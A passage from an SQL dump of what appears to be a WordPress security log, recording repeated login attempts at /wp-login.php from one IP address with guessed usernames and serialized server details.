04:24:38'),(94830,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"116\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51811\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"116\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746139180.4969051;s:12:\"REQUEST_TIME\";i:1746139180;}}','196.251.112.104',1,'2025-05-02 04:09:42','2025-05-03 04:24:38'),(94831,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"116\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51813\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"116\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746139180.5254469;s:12:\"REQUEST_TIME\";i:1746139180;}}','196.251.112.104',1,'2025-05-02 04:09:42','2025-05-03 04:24:38'),(94832,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"114\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51812\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"114\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746139180.522609;s:12:\"REQUEST_TIME\";i:1746139180;}}','196.251.112.104',1,'2025-05-02 04:09:42','2025-05-03 04:24:38'),(94833,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"120\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51814\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"120\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746139180.530467;s:12:\"REQUEST_TIME\";i:1746139180;}}','196.251.112.104',1,'2025-05-02 04:09:42','2025-05-03 04:24:38'),(94834,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"128\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51810\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"128\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746139180.4948759;s:12:\"REQUEST_TIME\";i:1746139180;}}','196.251.112.104',1,'2025-05-02 04:09:42','2025-05-03 04:24:38'),(94835,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"117\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51695\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"117\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746139349.4275229;s:12:\"REQUEST_TIME\";i:1746139349;}}','196.251.112.104',1,'2025-05-02 04:12:31','2025-05-03 04:24:38'),(94836,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"117\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51697\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"117\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746139349.4407301;s:12:\"REQUEST_TIME\";i:1746139349;}}','196.251.112.104',1,'2025-05-02 04:12:31','2025-05-03 04:24:38'),(94837,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"115\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51696\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"115\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746139349.4439521;s:12:\"REQUEST_TIME\";i:1746139349;}}','196.251.112.104',1,'2025-05-02 04:12:31','2025-05-03 04:24:38'),(94838,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"121\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51698\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"121\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746139349.486814;s:12:\"REQUEST_TIME\";i:1746139349;}}','196.251.112.104',1,'2025-05-02 04:12:31','2025-05-03 04:24:38'),(94839,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"129\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51694\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"129\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746139349.415987;s:12:\"REQUEST_TIME\";i:1746139349;}}','196.251.112.104',1,'2025-05-02 04:12:31','2025-05-03 04:24:38'),(94840,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"118\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51539\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"118\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746139523.349045;s:12:\"REQUEST_TIME\";i:1746139523;}}','196.251.112.104',1,'2025-05-02 04:15:25','2025-05-03 04:24:38'),(94841,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"119\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51538\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"119\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746139523.3502901;s:12:\"REQUEST_TIME\";i:1746139523;}}','196.251.112.104',1,'2025-05-02 04:15:25','2025-05-03 